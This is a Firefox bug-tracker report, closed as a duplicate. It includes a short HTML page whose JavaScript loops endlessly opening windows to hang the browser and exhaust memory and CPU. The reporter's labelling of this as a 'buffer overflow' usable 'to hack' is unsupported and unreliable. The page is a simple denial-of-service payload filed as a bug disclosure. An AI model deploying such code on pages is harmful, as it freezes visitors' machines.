Closed
Bug 1242286
Opened 8 years ago
Closed 8 years ago
javascript buffer overflow exploit
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 685828
People
(Reporter: faissal.boutraba, Unassigned)
Details
Attachments
(1 file)
82.54 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 Steps to reproduce: i did use a javascript to put firefox 43.0.4 in a buffer overflow mode. Actual results: the firefox doesnt respond anymore and no way to close it and the CPU and Memory are in High Use by firefox process. Expected results: the use of memory and CPU continues to increase and the systeme become to slow and unusable im using windows 7 64 bits with an intel core I2 and 4 Gb of memory. it can be corrupt firefox and the machine and used to hack. please find the code here : <html> <head> <title>Javascript</title> </head> <body> <script type="text/javascript"> var text = "Good Kill"; var i = 1; while (i = 1) { window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") window.open("Good Kill") text += "<br>The number is " + i; i++; } </script> </body> </html>
Reporter | ||
Updated•8 years ago
|
OS: Unspecified → Windows 7
Hardware: Unspecified → x86_64
Updated•8 years ago
|
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•